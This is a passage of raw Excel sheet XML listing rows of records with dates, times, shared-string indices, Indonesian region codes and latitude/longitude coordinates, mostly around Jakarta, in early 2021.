      </c>
      <c r="E3566" t="s">
        <v>23</v>
      </c>
      <c r="F3566" t="s">
        <v>11784</v>
      </c>
      <c r="G3566" t="s">
        <v>11785</v>
      </c>
      <c r="H3566" t="s">
        <v>26</v>
      </c>
      <c r="I3566" t="s">
        <v>11175</v>
      </c>
      <c r="J3566" t="s">
        <v>2627</v>
      </c>
      <c r="L3566" t="s">
        <v>11786</v>
      </c>
      <c r="M3566">
        <v>3216082005</v>
      </c>
      <c r="N3566">
        <v>3216082</v>
      </c>
      <c r="O3566">
        <v>3216</v>
      </c>
      <c r="P3566">
        <v>32</v>
      </c>
      <c r="Q3566" t="s">
        <v>985</v>
      </c>
      <c r="R3566" t="s">
        <v>601</v>
      </c>
      <c r="S3566" t="s">
        <v>41</v>
      </c>
      <c r="T3566" t="s">
        <v>42</v>
      </c>
      <c r="U3566" s="5">
        <v>10705542</v>
      </c>
      <c r="V3566" s="5" t="s">
        <v>17662</v>
      </c>
      <c r="W3566" s="5">
        <v>-616060</v>
      </c>
      <c r="X3566" t="s">
        <v>21395</v>
      </c>
      <c r="Y3566" t="str">
        <f t="shared" si="55"/>
        <v>-6.16060,107.05542</v>
      </c>
    </row>
    <row r="3567" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3567">
        <v>275719</v>
      </c>
      <c r="B3567" s="1">
        <v>44248</v>
      </c>
      <c r="C3567" s="2">
        <v>0.49513888888888885</v>
      </c>
      <c r="D3567" t="s">
        <v>2648</v>
      </c>
      <c r="E3567" t="s">
        <v>23</v>
      </c>
      <c r="G3567" t="s">
        <v>11787</v>
      </c>
      <c r="H3567" t="s">
        <v>26</v>
      </c>
      <c r="I3567" t="s">
        <v>1059</v>
      </c>
      <c r="J3567" t="s">
        <v>2676</v>
      </c>
      <c r="L3567" t="s">
        <v>2716</v>
      </c>
      <c r="M3567">
        <v>3174080005</v>
      </c>
      <c r="N3567">
        <v>3174080</v>
      </c>
      <c r="O3567">
        <v>3174</v>
      </c>
      <c r="P3567">
        <v>31</v>
      </c>
      <c r="Q3567" t="s">
        <v>2663</v>
      </c>
      <c r="R3567" t="s">
        <v>695</v>
      </c>
      <c r="S3567" t="s">
        <v>32</v>
      </c>
      <c r="T3567" t="s">
        <v>33</v>
      </c>
      <c r="U3567" s="5">
        <v>10670187</v>
      </c>
      <c r="V3567" s="5" t="s">
        <v>17663</v>
      </c>
      <c r="W3567" s="5">
        <v>-610200</v>
      </c>
      <c r="X3567" t="s">
        <v>21396</v>
      </c>
      <c r="Y3567" t="str">
        <f t="shared" si="55"/>
        <v>-6.10200,106.70187</v>
      </c>
    </row>
    <row r="3568" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3568">
        <v>275720</v>
      </c>
      <c r="B3568" s="1">
        <v>44248</v>
      </c>
      <c r="C3568" s="2">
        <v>0.49374999999999997</v>
      </c>
      <c r="D3568" t="s">
        <v>2648</v>
      </c>
      <c r="E3568" t="s">
        <v>23</v>
      </c>
      <c r="G3568" t="s">
        <v>11788</v>
      </c>
      <c r="H3568" t="s">
        <v>26</v>
      </c>
      <c r="J3568" t="s">
        <v>2676</v>
      </c>
      <c r="L3568" t="s">
        <v>11789</v>
      </c>
      <c r="M3568">
        <v>3174080005</v>
      </c>
      <c r="N3568">
        <v>3174080</v>
      </c>
      <c r="O3568">
        <v>3174</v>
      </c>
      <c r="P3568">
        <v>31</v>
      </c>
      <c r="Q3568" t="s">
        <v>2663</v>
      </c>
      <c r="R3568" t="s">
        <v>695</v>
      </c>
      <c r="S3568" t="s">
        <v>32</v>
      </c>
      <c r="T3568" t="s">
        <v>33</v>
      </c>
      <c r="U3568" s="5">
        <v>10670266</v>
      </c>
      <c r="V3568" s="5" t="s">
        <v>17664</v>
      </c>
      <c r="W3568" s="5">
        <v>-610028</v>
      </c>
      <c r="X3568" t="s">
        <v>21397</v>
      </c>
      <c r="Y3568" t="str">
        <f t="shared" si="55"/>
        <v>-6.10028,106.70266</v>
      </c>
    </row>
    <row r="3569" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3569">
        <v>275997</v>
      </c>
      <c r="B3569" s="1">
        <v>44248</v>
      </c>
      <c r="C3569" s="2">
        <v>0.52196759259259262</v>
      </c>
      <c r="D3569" t="s">
        <v>22</v>
      </c>
      <c r="E3569" t="s">
        <v>23</v>
      </c>
      <c r="F3569" t="s">
        <v>11790</v>
      </c>
      <c r="G3569" t="s">
        <v>11791</v>
      </c>
      <c r="H3569" t="s">
        <v>26</v>
      </c>
      <c r="I3569" t="s">
        <v>1316</v>
      </c>
      <c r="J3569" t="s">
        <v>2627</v>
      </c>
      <c r="L3569" t="s">
        <v>11792</v>
      </c>
      <c r="M3569">
        <v>3216070014</v>
      </c>
      <c r="N3569">
        <v>3216070</v>
      </c>
      <c r="O3569">
        <v>3216</v>
      </c>
      <c r="P3569">
        <v>32</v>
      </c>
      <c r="Q3569" t="s">
        <v>5478</v>
      </c>
      <c r="R3569" t="s">
        <v>5479</v>
      </c>
      <c r="S3569" t="s">
        <v>41</v>
      </c>
      <c r="T3569" t="s">
        <v>42</v>
      </c>
      <c r="U3569" s="5">
        <v>10709507</v>
      </c>
      <c r="V3569" s="5" t="s">
        <v>17665</v>
      </c>
      <c r="W3569" s="5">
        <v>-625251</v>
      </c>
      <c r="X3569" t="s">
        <v>19663</v>
      </c>
      <c r="Y3569" t="str">
        <f t="shared" si="55"/>
        <v>-6.25251,107.09507</v>
      </c>
    </row>
    <row r="3570" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3570">
        <v>278314</v>
      </c>
      <c r="B3570" s="1">
        <v>44248</v>
      </c>
      <c r="C3570" s="2">
        <v>0.80114583333333333</v>
      </c>
      <c r="D3570" t="s">
        <v>22</v>
      </c>
      <c r="E3570" t="s">
        <v>23</v>
      </c>
      <c r="F3570" t="s">
        <v>11793</v>
      </c>
      <c r="G3570" t="s">
        <v>11794</v>
      </c>
      <c r="H3570" t="s">
        <v>26</v>
      </c>
      <c r="I3570" t="s">
        <v>92</v>
      </c>
      <c r="J3570" t="s">
        <v>3135</v>
      </c>
      <c r="L3570" t="s">
        <v>11795</v>
      </c>
      <c r="M3570">
        <v>3671012003</v>
      </c>
      <c r="N3570">
        <v>3671012</v>
      </c>
      <c r="O3570">
        <v>3671</v>
      </c>
      <c r="P3570">
        <v>36</v>
      </c>
      <c r="Q3570" t="s">
        <v>760</v>
      </c>
      <c r="R3570" t="s">
        <v>760</v>
      </c>
      <c r="S3570" t="s">
        <v>201</v>
      </c>
      <c r="T3570" t="s">
        <v>171</v>
      </c>
      <c r="U3570" s="5">
        <v>10670786</v>
      </c>
      <c r="V3570" s="5" t="s">
        <v>17666</v>
      </c>
      <c r="W3570" s="5">
        <v>-621804</v>
      </c>
      <c r="X3570" t="s">
        <v>21398</v>
      </c>
      <c r="Y3570" t="str">
        <f t="shared" si="55"/>
        <v>-6.21804,106.70786</v>
      </c>
    </row>
    <row r="3571" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3571">
        <v>278484</v>
      </c>
      <c r="B3571" s="1">
        <v>44248</v>
      </c>
      <c r="C3571" s="2">
        <v>0.82944444444444443</v>
      </c>
      <c r="D3571" t="s">
        <v>22</v>
      </c>
      <c r="E3571" t="s">
        <v>23</v>
      </c>
      <c r="F3571" t="s">
        <v>11796</v>
      </c>
      <c r="G3571" t="s">
        <v>11797</v>
      </c>
      <c r="H3571" t="s">
        <v>26</v>
      </c>
      <c r="I3571" t="s">
        <v>5580</v>
      </c>
      <c r="J3571" t="s">
        <v>2627</v>
      </c>
      <c r="L3571" t="s">
        <v>11798</v>
      </c>
      <c r="M3571">
        <v>3216090009</v>
      </c>
      <c r="N3571">
        <v>3216090</v>
      </c>
      <c r="O3571">
        <v>3216</v>
      </c>
      <c r="P3571">
        <v>32</v>
      </c>
      <c r="Q3571" t="s">
        <v>11799</v>
      </c>
      <c r="R3571" t="s">
        <v>335</v>
      </c>
      <c r="S3571" t="s">
        <v>41</v>
      </c>
      <c r="T3571" t="s">
        <v>42</v>
      </c>
      <c r="U3571" s="5">
        <v>10704534</v>
      </c>
      <c r="V3571" s="5" t="s">
        <v>17667</v>
      </c>
      <c r="W3571" s="5">
        <v>-608946</v>
      </c>
      <c r="X3571" t="s">
        <v>21399</v>
      </c>
      <c r="Y3571" t="str">
        <f t="shared" si="55"/>
        <v>-6.08946,107.04534</v>
      </c>
    </row>
    <row r="3572" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3572">
        <v>279163</v>
      </c>
      <c r="B3572" s="1">
        <v>44248</v>
      </c>
      <c r="C3572" s="2">
        <v>0.95988425925925924</v>
      </c>
      <c r="D3572" t="s">
        <v>22</v>
      </c>
      <c r="E3572" t="s">
        <v>23</v>
      </c>
      <c r="F3572" t="s">
        <v>11800</v>
      </c>
      <c r="H3572" t="s">
        <v>26</v>
      </c>
      <c r="I3572" t="s">
        <v>1359</v>
      </c>
      <c r="J3572" t="s">
        <v>3135</v>
      </c>
      <c r="L3572" t="s">
        <v>11801</v>
      </c>
      <c r="M3572">
        <v>3671011001</v>
      </c>
      <c r="N3572">
        <v>3671011</v>
      </c>
      <c r="O3572">
        <v>3671</v>
      </c>
      <c r="P3572">
        <v>36</v>
      </c>
      <c r="Q3572" t="s">
        <v>11802</v>
      </c>
      <c r="R3572" t="s">
        <v>701</v>
      </c>
      <c r="S3572" t="s">
        <v>201</v>
      </c>
      <c r="T3572" t="s">
        <v>171</v>
      </c>
      <c r="U3572" s="5">
        <v>10672802</v>
      </c>
      <c r="V3572" s="5" t="s">
        <v>17668</v>
      </c>
      <c r="W3572" s="5">
        <v>-625027</v>
      </c>
      <c r="X3572" t="s">
        <v>21400</v>
      </c>
      <c r="Y3572" t="str">
        <f t="shared" si="55"/>
        <v>-6.25027,106.72802</v>
      </c>
    </row>
    <row r="3573" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3573">
        <v>279224</v>
      </c>
      <c r="B3573" s="1">
        <v>44248</v>
      </c>
      <c r="C3573" s="2">
        <v>0.97504629629629624</v>
      </c>
      <c r="D3573" t="s">
        <v>22</v>
      </c>
      <c r="E3573" t="s">
        <v>23</v>
      </c>
      <c r="F3573" t="s">
        <v>11803</v>
      </c>
      <c r="G3573" t="s">
        <v>11804</v>
      </c>
      <c r="H3573" t="s">
        <v>26</v>
      </c>
      <c r="I3573" t="s">
        <v>1178</v>
      </c>
      <c r="J3573" t="s">
        <v>2627</v>
      </c>
      <c r="L3573" t="s">
        <v>11805</v>
      </c>
      <c r="M3573">
        <v>3216061008</v>
      </c>
      <c r="N3573">
        <v>3216061</v>
      </c>
      <c r="O3573">
        <v>3216</v>
      </c>
      <c r="P3573">
        <v>32</v>
      </c>
      <c r="Q3573" t="s">
        <v>11046</v>
      </c>
      <c r="R3573" t="s">
        <v>55</v>
      </c>
      <c r="S3573" t="s">
        <v>41</v>
      </c>
      <c r="T3573" t="s">
        <v>42</v>
      </c>
      <c r="U3573" s="5">
        <v>10714185</v>
      </c>
      <c r="V3573" s="5" t="s">
        <v>17669</v>
      </c>
      <c r="W3573" s="5">
        <v>-626009</v>
      </c>
      <c r="X3573" t="s">
        <v>18295</v>
      </c>
      <c r="Y3573" t="str">
        <f t="shared" si="55"/>
        <v>-6.26009,107.14185</v>
      </c>
    </row>
    <row r="3574" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3574">
        <v>279891</v>
      </c>
      <c r="B3574" s="1">
        <v>44249</v>
      </c>
      <c r="C3574" s="2">
        <v>0.1277777777777778</v>
      </c>
      <c r="D3574" t="s">
        <v>2648</v>
      </c>
      <c r="E3574" t="s">
        <v>23</v>
      </c>
      <c r="G3574" t="s">
        <v>11806</v>
      </c>
      <c r="H3574" t="s">
        <v>26</v>
      </c>
      <c r="I3574" t="s">
        <v>103</v>
      </c>
      <c r="J3574" t="s">
        <v>6293</v>
      </c>
      <c r="L3574" t="s">
        <v>11807</v>
      </c>
      <c r="M3574">
        <v>3172050005</v>
      </c>
      <c r="N3574">
        <v>3172050</v>
      </c>
      <c r="O3574">
        <v>3172</v>
      </c>
      <c r="P3574">
        <v>31</v>
      </c>
      <c r="Q3574" t="s">
        <v>358</v>
      </c>
      <c r="R3574" t="s">
        <v>358</v>
      </c>
      <c r="S3574" t="s">
        <v>49</v>
      </c>
      <c r="T3574" t="s">
        <v>33</v>
      </c>
      <c r="U3574" s="5">
        <v>10687361</v>
      </c>
      <c r="V3574" s="5" t="s">
        <v>16602</v>
      </c>
      <c r="W3574" s="5">
        <v>-628233</v>
      </c>
      <c r="X3574" t="s">
        <v>21401</v>
      </c>
      <c r="Y3574" t="str">
        <f t="shared" si="55"/>
        <v>-6.28233,106.87361</v>
      </c>
    </row>
    <row r="3575" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3575">
        <v>279907</v>
      </c>
      <c r="B3575" s="1">
        <v>44249</v>
      </c>
      <c r="C3575" s="2">
        <v>0.12916666666666668</v>
      </c>
      <c r="D3575" t="s">
        <v>2648</v>
      </c>
      <c r="E3575" t="s">
        <v>23</v>
      </c>
      <c r="G3575" t="s">
        <v>11808</v>
      </c>
      <c r="H3575" t="s">
        <v>26</v>
      </c>
      <c r="I3575" t="s">
        <v>608</v>
      </c>
      <c r="J3575" t="s">
        <v>6001</v>
      </c>
      <c r="L3575" t="s">
        <v>11809</v>
      </c>
      <c r="M3575">
        <v>3171090001</v>
      </c>
      <c r="N3575">
        <v>3171090</v>
      </c>
      <c r="O3575">
        <v>3171</v>
      </c>
      <c r="P3575">
        <v>31</v>
      </c>
      <c r="Q3575" t="s">
        <v>6003</v>
      </c>
      <c r="R3575" t="s">
        <v>347</v>
      </c>
      <c r="S3575" t="s">
        <v>108</v>
      </c>
      <c r="T3575" t="s">
        <v>33</v>
      </c>
      <c r="U3575" s="5">
        <v>10683827</v>
      </c>
      <c r="V3575" s="5" t="s">
        <v>17670</v>
      </c>
      <c r="W3575" s="5">
        <v>-622510</v>
      </c>
      <c r="X3575" t="s">
        <v>21402</v>
      </c>
      <c r="Y3575" t="str">
        <f t="shared" si="55"/>
        <v>-6.22510,106.83827</v>
      </c>
    </row>
    <row r="3576" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3576">
        <v>280058</v>
      </c>
      <c r="B3576" s="1">
        <v>44249</v>
      </c>
      <c r="C3576" s="2">
        <v>0.17503472222222224</v>
      </c>
      <c r="D3576" t="s">
        <v>22</v>
      </c>
      <c r="E3576" t="s">
        <v>23</v>
      </c>
      <c r="F3576" t="s">
        <v>11810</v>
      </c>
      <c r="G3576" t="s">
        <v>11811</v>
      </c>
      <c r="H3576" t="s">
        <v>26</v>
      </c>
      <c r="I3576" t="s">
        <v>585</v>
      </c>
      <c r="J3576" t="s">
        <v>2627</v>
      </c>
      <c r="L3576" t="s">
        <v>11812</v>
      </c>
      <c r="M3576">
        <v>3216090009</v>
      </c>
      <c r="N3576">
        <v>3216090</v>
      </c>
      <c r="O3576">
        <v>3216</v>
      </c>
      <c r="P3576">
        <v>32</v>
      </c>
      <c r="Q3576" t="s">
        <v>11799</v>
      </c>
      <c r="R3576" t="s">
        <v>335</v>
      </c>
      <c r="S3576" t="s">
        <v>41</v>
      </c>
      <c r="T3576" t="s">
        <v>42</v>
      </c>
      <c r="U3576" s="5">
        <v>10704542</v>
      </c>
      <c r="V3576" s="5" t="s">
        <v>17671</v>
      </c>
      <c r="W3576" s="5">
        <v>-608930</v>
      </c>
      <c r="X3576" t="s">
        <v>21403</v>
      </c>
      <c r="Y3576" t="str">
        <f t="shared" si="55"/>
        <v>-6.08930,107.04542</v>
      </c>
    </row>
    <row r="3577" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3577">
        <v>280903</v>
      </c>
      <c r="B3577" s="1">
        <v>44249</v>
      </c>
      <c r="C3577" s="2">
        <v>0.42638888888888887</v>
      </c>
      <c r="D3577" t="s">
        <v>2648</v>
      </c>
      <c r="E3577" t="s">
        <v>23</v>
      </c>
      <c r="G3577" t="s">
        <v>11813</v>
      </c>
      <c r="H3577" t="s">
        <v>26</v>
      </c>
      <c r="J3577" t="s">
        <v>8300</v>
      </c>
      <c r="L3577" t="s">
        <v>11814</v>
      </c>
      <c r="M3577">
        <v>3174020005</v>
      </c>
      <c r="N3577">
        <v>3174020</v>
      </c>
      <c r="O3577">
        <v>3174</v>
      </c>
      <c r="P3577">
        <v>31</v>
      </c>
      <c r="Q3577" t="s">
        <v>30</v>
      </c>
      <c r="R3577" t="s">
        <v>31</v>
      </c>
      <c r="S3577" t="s">
        <v>32</v>
      </c>
      <c r="T3577" t="s">
        <v>33</v>
      </c>
      <c r="U3577" s="5">
        <v>10677464</v>
      </c>
      <c r="V3577" s="5" t="s">
        <v>17672</v>
      </c>
      <c r="W3577" s="5">
        <v>-618386</v>
      </c>
      <c r="X3577" t="s">
        <v>21404</v>
      </c>
      <c r="Y3577" t="str">
        <f t="shared" si="55"/>
        <v>-6.18386,106.77464</v>
      </c>
    </row>
    <row r="3578" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3578">
        <v>280908</v>
      </c>
      <c r="B3578" s="1">
        <v>44249</v>
      </c>
      <c r="C3578" s="2">
        <v>0.42777777777777781</v>
      </c>
      <c r="D3578" t="s">
        <v>2648</v>
      </c>
      <c r="E3578" t="s">
        <v>23</v>
      </c>
      <c r="G3578" t="s">
        <v>11815</v>
      </c>
      <c r="H3578" t="s">
        <v>26</v>
      </c>
      <c r="I3578" t="s">
        <v>608</v>
      </c>
      <c r="J3578" t="s">
        <v>8300</v>
      </c>
      <c r="L3578" t="s">
        <v>11816</v>
      </c>
      <c r="M3578">
        <v>3174020005</v>
      </c>
      <c r="N3578">
        <v>3174020</v>
      </c>
      <c r="O3578">
        <v>3174</v>
      </c>
      <c r="P3578">
        <v>31</v>
      </c>
      <c r="Q3578" t="s">
        <v>30</v>
      </c>
      <c r="R3578" t="s">
        <v>31</v>
      </c>
      <c r="S3578" t="s">
        <v>32</v>
      </c>
      <c r="T3578" t="s">
        <v>33</v>
      </c>
      <c r="U3578" s="5">
        <v>10677454</v>
      </c>
      <c r="V3578" s="5" t="s">
        <v>17673</v>
      </c>
      <c r="W3578" s="5">
        <v>-618396</v>
      </c>
      <c r="X3578" t="s">
        <v>21405</v>
      </c>
      <c r="Y3578" t="str">
        <f t="shared" si="55"/>
        <v>-6.18396,106.77454</v>
      </c>
    </row>
    <row r="3579" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3579">
        <v>281726</v>
      </c>
      <c r="B3579" s="1">
        <v>44249</v>
      </c>
      <c r="C3579" s="2">
        <v>0.71055555555555561</v>
      </c>
      <c r="D3579" t="s">
        <v>22</v>
      </c>
      <c r="E3579" t="s">
        <v>23</v>
      </c>
      <c r="F3579" t="s">
        <v>11817</v>
      </c>
      <c r="G3579" t="s">
        <v>11818</v>
      </c>
      <c r="H3579" t="s">
        <v>26</v>
      </c>
      <c r="I3579" t="s">
        <v>9346</v>
      </c>
      <c r="J3579" t="s">
        <v>2627</v>
      </c>
      <c r="L3579" t="s">
        <v>11819</v>
      </c>
      <c r="M3579">
        <v>3275030003</v>
      </c>
      <c r="N3579">
        <v>3275030</v>
      </c>
      <c r="O3579">
        <v>3275</v>
      </c>
      <c r="P3579">
        <v>32</v>
      </c>
      <c r="Q3579" t="s">
        <v>11820</v>
      </c>
      <c r="R3579" t="s">
        <v>11385</v>
      </c>
      <c r="S3579" t="s">
        <v>41</v>
      </c>
      <c r="T3579" t="s">
        <v>42</v>
      </c>
      <c r="U3579" s="5">
        <v>10698873</v>
      </c>
      <c r="V3579" s="5" t="s">
        <v>17674</v>
      </c>
      <c r="W3579" s="5">
        <v>-634478</v>
      </c>
      <c r="X3579" t="s">
        <v>21406</v>
      </c>
      <c r="Y3579" t="str">
        <f t="shared" si="55"/>
        <v>-6.34478,106.98873</v>
      </c>
    </row>
    <row r="3580" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3580">
        <v>281893</v>
      </c>
      <c r="B3580" s="1">
        <v>44249</v>
      </c>
      <c r="C3580" s="2">
        <v>0.82615740740740751</v>
      </c>
      <c r="D3580" t="s">
        <v>22</v>
      </c>
      <c r="E3580" t="s">
        <v>23</v>
      </c>
      <c r="F3580" t="s">
        <v>11821</v>
      </c>
      <c r="H3580" t="s">
        <v>7086</v>
      </c>
      <c r="I3580" t="s">
        <v>11822</v>
      </c>
      <c r="J3580" t="s">
        <v>7678</v>
      </c>
      <c r="L3580" t="s">
        <v>11823</v>
      </c>
      <c r="M3580">
        <v>7207020016</v>
      </c>
      <c r="N3580">
        <v>7207020</v>
      </c>
      <c r="O3580">
        <v>7207</v>
      </c>
      <c r="P3580">
        <v>72</v>
      </c>
      <c r="Q3580" t="s">
        <v>11824</v>
      </c>
      <c r="R3580" t="s">
        <v>11825</v>
      </c>
      <c r="S3580" t="s">
        <v>11826</v>
      </c>
      <c r="T3580" t="s">
        <v>7683</v>
      </c>
      <c r="U3580" s="5">
        <v>12139939</v>
      </c>
      <c r="V3580" s="5" t="s">
        <v>17675</v>
      </c>
      <c r="W3580" s="5">
        <v>112906</v>
      </c>
      <c r="X3580" t="s">
        <v>21407</v>
      </c>
      <c r="Y3580" t="str">
        <f t="shared" si="55"/>
        <v>1.12906,121.39939</v>
      </c>
    </row>
    <row r="3581" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3581">
        <v>282069</v>
      </c>
      <c r="B3581" s="1">
        <v>44250</v>
      </c>
      <c r="C3581" s="2">
        <v>8.5150462962962969E-2</v>
      </c>
      <c r="D3581" t="s">
        <v>22</v>
      </c>
      <c r="E3581" t="s">
        <v>23</v>
      </c>
      <c r="F3581" t="s">
        <v>11827</v>
      </c>
      <c r="G3581" t="s">
        <v>11828</v>
      </c>
      <c r="H3581" t="s">
        <v>26</v>
      </c>
      <c r="I3581" t="s">
        <v>974</v>
      </c>
      <c r="J3581" t="s">
        <v>11829</v>
      </c>
      <c r="L3581" t="s">
        <v>11830</v>
      </c>
      <c r="M3581">
        <v>3173020004</v>
      </c>
      <c r="N3581">
        <v>3173020</v>
      </c>
      <c r="O3581">
        <v>3173</v>
      </c>
      <c r="P3581">
        <v>31</v>
      </c>
      <c r="Q3581" t="s">
        <v>6651</v>
      </c>
      <c r="R3581" t="s">
        <v>179</v>
      </c>
      <c r="S3581" t="s">
        <v>62</v>
      </c>
      <c r="T3581" t="s">
        <v>33</v>
      </c>
      <c r="U3581" s="5">
        <v>10682776</v>
      </c>
      <c r="V3581" s="5" t="s">
        <v>17676</v>
      </c>
      <c r="W3581" s="5">
        <v>-618756</v>
      </c>
      <c r="X3581" t="s">
        <v>21408</v>
      </c>
      <c r="Y3581" t="str">
        <f t="shared" si="55"/>
        <v>-6.18756,106.82776</v>
      </c>
    </row>
    <row r="3582" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3582">
        <v>282105</v>
      </c>
      <c r="B3582" s="1">
        <v>44250</v>
      </c>
      <c r="C3582" s="2">
        <v>0.20531250000000001</v>
      </c>
      <c r="D3582" t="s">
        <v>22</v>
      </c>
      <c r="E3582" t="s">
        <v>23</v>
      </c>
      <c r="F3582" t="s">
        <v>11831</v>
      </c>
      <c r="G3582" t="s">
        <v>11832</v>
      </c>
      <c r="H3582" t="s">
        <v>7086</v>
      </c>
      <c r="I3582" t="s">
        <v>7087</v>
      </c>
      <c r="J3582" t="s">
        <v>6963</v>
      </c>
      <c r="L3582" t="s">
        <v>11833</v>
      </c>
      <c r="M3582">
        <v>3171020007</v>
      </c>
      <c r="N3582">
        <v>3171020</v>
      </c>
      <c r="O3582">
        <v>3171</v>
      </c>
      <c r="P3582">
        <v>31</v>
      </c>
      <c r="Q3582" t="s">
        <v>5778</v>
      </c>
      <c r="R3582" t="s">
        <v>484</v>
      </c>
      <c r="S3582" t="s">
        <v>108</v>
      </c>
      <c r="T3582" t="s">
        <v>33</v>
      </c>
      <c r="U3582" s="5">
        <v>10684925</v>
      </c>
      <c r="V3582" s="5" t="s">
        <v>17677</v>
      </c>
      <c r="W3582" s="5">
        <v>-628990</v>
      </c>
      <c r="X3582" t="s">
        <v>21409</v>
      </c>
      <c r="Y3582" t="str">
        <f t="shared" si="55"/>
        <v>-6.28990,106.84925</v>
      </c>
    </row>
    <row r="3583" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3583">
        <v>282107</v>
      </c>
      <c r="B3583" s="1">
        <v>44250</v>
      </c>
      <c r="C3583" s="2">
        <v>0.20726851851851849</v>
      </c>
      <c r="D3583" t="s">
        <v>22</v>
      </c>
      <c r="E3583" t="s">
        <v>23</v>
      </c>
      <c r="F3583" t="s">
        <v>11834</v>
      </c>
      <c r="H3583" t="s">
        <v>7086</v>
      </c>
      <c r="I3583" t="s">
        <v>9331</v>
      </c>
      <c r="J3583" t="s">
        <v>6963</v>
      </c>
      <c r="M3583">
        <v>3171020007</v>
      </c>
      <c r="N3583">
        <v>3171020</v>
      </c>
      <c r="O3583">
        <v>3171</v>
      </c>
      <c r="P3583">
        <v>31</v>
      </c>
      <c r="Q3583" t="s">
        <v>5778</v>
      </c>
      <c r="R3583" t="s">
        <v>484</v>
      </c>
      <c r="S3583" t="s">
        <v>108</v>
      </c>
      <c r="T3583" t="s">
        <v>33</v>
      </c>
      <c r="U3583" s="5">
        <v>10684925</v>
      </c>
      <c r="V3583" s="5" t="s">
        <v>17677</v>
      </c>
      <c r="W3583" s="5">
        <v>-628992</v>
      </c>
      <c r="X3583" t="s">
        <v>21208</v>
      </c>
      <c r="Y3583" t="str">
        <f t="shared" si="55"/>
        <v>-6.28992,106.84925</v>
      </c>
    </row>
    <row r="3584" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3584">
        <v>282113</v>
      </c>
      <c r="B3584" s="1">
        <v>44250</v>
      </c>
      <c r="C3584" s="2">
        <v>0.22083333333333333</v>
      </c>
      <c r="D3584" t="s">
        <v>2648</v>
      </c>
      <c r="E3584" t="s">
        <v>23</v>
      </c>
      <c r="G3584" t="s">
        <v>11835</v>
      </c>
      <c r="H3584" t="s">
        <v>26</v>
      </c>
      <c r="J3584" t="s">
        <v>4778</v>
      </c>
      <c r="L3584" t="s">
        <v>2766</v>
      </c>
      <c r="M3584">
        <v>3174020004</v>
      </c>
      <c r="N3584">
        <v>3174020</v>
      </c>
      <c r="O3584">
        <v>3174</v>
      </c>
      <c r="P3584">
        <v>31</v>
      </c>
      <c r="Q3584" t="s">
        <v>31</v>
      </c>
      <c r="R3584" t="s">
        <v>31</v>
      </c>
      <c r="S3584" t="s">
        <v>32</v>
      </c>
      <c r="T3584" t="s">
        <v>33</v>
      </c>
      <c r="U3584" s="5">
        <v>10676794</v>
      </c>
      <c r="V3584" s="5" t="s">
        <v>17678</v>
      </c>
      <c r="W3584" s="5">
        <v>-620146</v>
      </c>
      <c r="X3584" t="s">
        <v>18958</v>
      </c>
      <c r="Y3584" t="str">
        <f t="shared" si="55"/>
        <v>-6.20146,106.76794</v>
      </c>
    </row>
    <row r="3585" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3585">
        <v>282165</v>
      </c>
      <c r="B3585" s="1">
        <v>44250</v>
      </c>
      <c r="C3585" s="2">
        <v>0.31108796296296298</v>
      </c>
      <c r="D3585" t="s">
        <v>22</v>
      </c>
      <c r="E3585" t="s">
        <v>23</v>
      </c>
      <c r="F3585" t="s">
        <v>11836</v>
      </c>
      <c r="G3585" t="s">
        <v>11837</v>
      </c>
      <c r="H3585" t="s">
        <v>26</v>
      </c>
      <c r="I3585" t="s">
        <v>5440</v>
      </c>
      <c r="J3585" t="s">
        <v>2845</v>
      </c>
      <c r="L3585" t="s">
        <v>11838</v>
      </c>
      <c r="M3585">
        <v>3172070003</v>
      </c>
      <c r="N3585">
        <v>3172070</v>
      </c>
      <c r="O3585">
        <v>3172</v>
      </c>
      <c r="P3585">
        <v>31</v>
      </c>
      <c r="Q3585" t="s">
        <v>2659</v>
      </c>
      <c r="R3585" t="s">
        <v>128</v>
      </c>
      <c r="S3585" t="s">
        <v>49</v>
      </c>
      <c r="T3585" t="s">
        <v>33</v>
      </c>
      <c r="U3585" s="5">
        <v>10693285</v>
      </c>
      <c r="V3585" s="5" t="s">
        <v>17228</v>
      </c>
      <c r="W3585" s="5">
        <v>-623707</v>
      </c>
      <c r="X3585" t="s">
        <v>21410</v>
      </c>
      <c r="Y3585" t="str">
        <f t="shared" si="55"/>
        <v>-6.23707,106.93285</v>
      </c>
    </row>
    <row r="3586" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3586">
        <v>282167</v>
      </c>
      <c r="B3586" s="1">
        <v>44250</v>
      </c>
      <c r="C3586" s="2">
        <v>0.3159837962962963</v>
      </c>
      <c r="D3586" t="s">
        <v>22</v>
      </c>
      <c r="E3586" t="s">
        <v>23</v>
      </c>
      <c r="F3586" t="s">
        <v>11839</v>
      </c>
      <c r="G3586" t="s">
        <v>11840</v>
      </c>
      <c r="H3586" t="s">
        <v>26</v>
      </c>
      <c r="I3586" t="s">
        <v>137</v>
      </c>
      <c r="J3586" t="s">
        <v>9316</v>
      </c>
      <c r="M3586">
        <v>9403230015</v>
      </c>
      <c r="N3586">
        <v>9403230</v>
      </c>
      <c r="O3586">
        <v>9403</v>
      </c>
      <c r="P3586">
        <v>94</v>
      </c>
      <c r="Q3586" t="s">
        <v>11841</v>
      </c>
      <c r="R3586" t="s">
        <v>11842</v>
      </c>
      <c r="S3586" t="s">
        <v>11843</v>
      </c>
      <c r="T3586" t="s">
        <v>9321</v>
      </c>
      <c r="U3586" s="5">
        <v>14050338</v>
      </c>
      <c r="V3586" s="5" t="s">
        <v>17679</v>
      </c>
      <c r="W3586" s="5">
        <v>-258680</v>
      </c>
      <c r="X3586" t="s">
